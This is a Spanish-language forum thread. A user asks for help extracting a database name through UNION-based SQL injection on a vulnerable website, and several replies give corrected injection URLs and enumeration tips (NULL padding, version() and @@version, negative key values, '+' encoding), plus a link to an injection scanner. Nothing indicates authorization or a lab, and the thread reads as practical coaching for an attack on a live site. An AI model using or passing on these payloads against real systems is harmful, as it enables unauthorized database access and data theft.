bueno mi probemas es que tengo una web vuln me explico
es un ej
site.com/hack.php?key=14800 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
bueno se que la web tiene 28 columna pero cuado hago la inyeccion que seria esta
site.com/hack.php?key=14800 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
me dice los mismo no me da el nombre de la base de datos si no me explique aseto criticas gracias ayuda cual seria la inyeccion correcta o si nesecitan mas info graxx
Seguramente no es el campo indicado, cambia los numeros por "NULL" y agrega version(). @@version o now(), solo para saber que campo es el valido. de ahi partes para injectar dependiendo de la base de datos.
-berz3k.
O podes usar el script de Login Root http://eazyrlz.blogspot.com/2008/10/sql-injection-scanner.html
hola, como dijo berz3k seguro estas usando una columna que no se muestra,
para saber que columnas son mostradas deberias probar
site.com/hack.php?key=-1 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Asi, si en la pagina sale el numero 4 digamos, usa esa columna para poner database()
avisa si funciono,
saludos!
Yo creo que has hecho mal en la injeccion :S
site.com/hack.php?key=-1+union+select+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*
Prueba asi y nos avisas si te resulta =]
Espero te haya servido!